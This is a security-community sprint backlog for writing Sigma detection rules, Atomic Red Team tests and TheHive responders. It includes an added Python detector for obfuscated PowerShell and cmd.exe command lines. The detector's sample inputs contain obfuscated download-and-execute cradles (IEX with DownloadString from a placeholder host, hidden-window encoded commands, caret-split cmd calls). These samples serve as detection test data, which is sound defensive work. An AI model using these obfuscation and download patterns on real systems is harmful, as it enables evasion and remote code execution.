
OSCD Sprint #2: Backlog


This time we decided to break the backlog down into bite-size tasks, each with an Estimated Time to Complete (ETC). For most tasks the ETC is around 20-30 minutes. The tasks are tracked in the GitHub issues listed in the tables below.

Also, we listed the knowledge required to solve these tasks. You can find details on that and other important topics in the OSCD How-To.

It is worth mentioning that the backlog does not limit contributions. You are welcome to contribute your private analytics (Atomic Tests, Sigma Rules, TheHive Responders) even if they fall outside the defined scope.


Threat Detection

One of the most critical gaps in the Sigma Project ruleset is its inability to detect indicators of cmd.exe and PowerShell command-line obfuscation (the tricks automated by Invoke-Obfuscation and Invoke-DOSfuscation). Closing this gap is our main focus for the Threat Detection part of the sprint.

There are also a few tasks to develop Sigma rules for published Threat Detection research and for Threat Simulation tools.

GitHub Issue (list of tasks inside) | Required Knowledge                 | ETC per task
Windows: Invoke-Obfuscation         | Regexes, Sigma Rules               | < 30 min
Windows: Invoke-DOSfuscation        | Regexes, Sigma Rules               | ~ 1 hour
Windows: LOLBAS                     | Sigma Rules                        | < 30 min
Windows: Lateral Movement           | Splunk queries, Sigma Rules        | < 30 min
Windows: PowerShell Abuse           | Kibana queries, Sigma Rules        | < 30 min
Windows: Privilege Escalation       | Kibana queries, Sigma Rules        | < 30 min
Windows: ART cross-coverage         | Atomic Red Team Tests, Sigma Rules | ~ 1 hour [*]
macOS: ART cross-coverage           | Atomic Red Team Tests, Sigma Rules | ~ 1 hour
Linux: ART cross-coverage           | Atomic Red Team Tests, Sigma Rules | ~ 1 hour [*]
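To make concrete what the Invoke-Obfuscation and Invoke-DOSfuscation regex tasks involve, here is an added Python example. It is not part of the OSCD backlog or of the Sigma project's rules; the indicator regexes, the random-casing heuristic and its threshold, and all sample command lines are this example's own constructions (the hostname example.invalid uses a reserved TLD). It scans Sysmon-style process command lines for indicators typical of Invoke-Obfuscation (backticks inside tokens, short string fragments glued with `+`, the `-f` format operator, `[char]` casts, randomized casing of Verb-Noun tokens, any abbreviation of `-EncodedCommand`) and of Invoke-DOSfuscation (caret insertion, `%VAR:~x,y%` substring expansion, `set`/`call %VAR%` reassembly, empty quote pairs), and it decodes an `-EncodedCommand` payload so that obfuscation hidden inside the base64 blob is reported too.

```python
import base64
import re

# Indicator regexes for obfuscation tricks used by Invoke-Obfuscation (PowerShell)
# and Invoke-DOSfuscation (cmd.exe). These are this example's own approximations,
# not the Sigma project's rules; each one would be tuned against both obfuscated
# and benign command lines before becoming a Sigma rule.
INDICATORS = [
    # Backtick inside a token: I`E`X, Ne`w-Obj`ect
    ("ps_backtick_in_token", re.compile(r"\w`\w")),
    # Format operator reassembling a string from indexed pieces: ("{1}{0}" -f 'b','a')
    ("ps_format_operator", re.compile(r"\{\d+\}.{0,200}?\s-f\s+['\"$(\[@]", re.I | re.S)),
    # Short quoted fragments glued with +: 'I'+'nvo'+'ke-Ex'
    ("ps_string_concat", re.compile(r"(?:['\"][^'\"]{1,8}['\"]\s*\+\s*){2,}")),
    # Characters built from integers: [char]73+[char]69
    ("ps_char_cast", re.compile(r"\[char\]\s*\d+", re.I)),
    # Any prefix of -EncodedCommand (-e, -ec, -enc, ...) followed by a base64 blob
    ("ps_encoded_command", re.compile(r"-e(?:c|n\w{0,12})?\s+(?P<b64>[A-Za-z0-9+/=]{20,})", re.I)),
    # Caret escapes splitting a token: p^o^w^e^r^s^h^e^l^l
    ("cmd_caret_insertion", re.compile(r"\w\^\w")),
    # Environment variable substring expansion: %COMSPEC:~-16,-12%
    ("cmd_env_substring", re.compile(r"%\w+:~\s*-?\d+(?:,\s*-?\d+)?%")),
    # Payload stored in a variable and executed via call: set p=...&&call %p%
    ("cmd_call_variable", re.compile(r"\bcall\s+%\w+", re.I)),
    # Empty quote pairs inserted into a token: po""wer""shell
    ("cmd_quote_insertion", re.compile(r"\w\"\"\w")),
]
INDICATORS_BY_NAME = dict(INDICATORS)

# Verb-Noun shaped tokens (cmdlets). Base64 never contains '-', so blobs are skipped.
CMDLET_SHAPE = re.compile(r"\b[A-Za-z]{3,}-[A-Za-z]{3,}\b")


def case_alternation(token):
    """Fraction of adjacent letter pairs that flip case: 0.75 for NEw-OBjEcT, 0.5 for Get-Date."""
    letters = [c for c in token if c.isalpha()]
    if len(letters) < 2:
        return 0.0
    flips = sum(a.isupper() != b.isupper() for a, b in zip(letters, letters[1:]))
    return flips / (len(letters) - 1)


def scan_text(text):
    """Return the set of indicator names that fire on a piece of command text."""
    hits = {name for name, rx in INDICATORS if rx.search(text)}
    # Heuristic threshold chosen for this example: normal cmdlets stay at or below 0.5.
    if any(case_alternation(t) > 0.6 for t in CMDLET_SHAPE.findall(text)):
        hits.add("ps_random_case")
    return hits


def scan_commandline(cmdline):
    """Scan a command line, then decode any -EncodedCommand payload and scan that too."""
    hits = scan_text(cmdline)
    m = INDICATORS_BY_NAME["ps_encoded_command"].search(cmdline)
    if m:
        b64 = m.group("b64")
        try:
            # PowerShell expects the blob to be base64 of UTF-16LE text.
            decoded = base64.b64decode(b64 + "=" * (-len(b64) % 4)).decode("utf-16le", errors="replace")
        except ValueError:
            decoded = ""
        hits |= {"decoded:" + h for h in scan_text(decoded)}
    return hits


def _enc(script):
    """Build a -EncodedCommand argument the way PowerShell expects it."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed sample command lines for this example (not real telemetry).
SAMPLES = {
    "benign_script": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1",
    "ps_token_obfuscation": "powershell.exe -w hidden -c \"&('I'+'nvo'+'ke-Ex'+'pre'+'ssion') (NEw-OBjEcT SyStEm.NeT.WeBcLiEnT).DoWnLoAdStRiNg('http://example.invalid/a')\"",
    "ps_backtick": "powershell.exe -nop -c \"I`E`X (N`ew-Obj`ect Net.WebClient).DownloadString('http://example.invalid/a')\"",
    "ps_encoded_with_inner_format": "powershell.exe -NoP -NonI -W Hidden -Enc " + _enc("IEX (\"{1}{0}\" -f 'et-Date','G')"),
    "cmd_dosfuscation": 'cmd.exe /c "set p=po^wer^shell&&call %p:~0,10% -NoP -c Get-Date"',
}


def scan_samples():
    """Map each sample name to the sorted list of indicators that fired on it."""
    return {name: sorted(scan_commandline(cl)) for name, cl in SAMPLES.items()}


if __name__ == "__main__":
    for name, hits in scan_samples().items():
        print(f"{name:30} {hits or 'clean'}")
```

Each indicator name corresponds to what would become one `CommandLine|re` selection in a Sigma rule. The benign sample shows the other half of the task: every regex has to be checked against ordinary administrative command lines (for example `-ExecutionPolicy` and `-Encoding` must not trip the `-EncodedCommand` pattern), and the random-casing check is a heuristic that deserves a baseline run before it ships as a rule.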


Adversary Simulation

We compared the Sigma ruleset against the existing Atomic Red Team tests to see which rules have no test that exercises them, and compiled a list of the missing tests that can realistically be developed during the sprint.

GitHub Issue (list of tasks inside) | Required Knowledge                 | ETC per task
Atomic Red Team tests for Windows   | Atomic Red Team Tests, Sigma Rules | ~ 1 hour [*]
Atomic Red Team tests for Linux     | Atomic Red Team Tests, Sigma Rules | ~ 30 min


Incident Response

The GitHub issues listed here are independent tasks, each covering the development of one TheHive Responder with multiple Response Actions. These are the most complex tasks in the backlog and take a lot of time to complete (up to 16 hours even when the knowledge requirements are met). We recommend working on them in groups of two or three specialists; collaborators can be found in the comments of the specific GitHub issue.

GitHub Issue                           | Required Knowledge         | ETC per task
Palo Alto NGFW                         | Python, TheHive Responders | ~ 16 hours
Carbon Black Predictive Security Cloud | Python, TheHive Responders | ~ 8 hours
Duo Security                           | Python, TheHive Responders | ~ 4 hours
Azure Active Directory                 | Python, TheHive Responders | ~ 4 hours
Google Gmail                           | Python, TheHive Responders | ~ 8 hours


[*] ETC for most of the tasks in the issue. Tasks that may take longer are commented on separately in the GitHub issue.

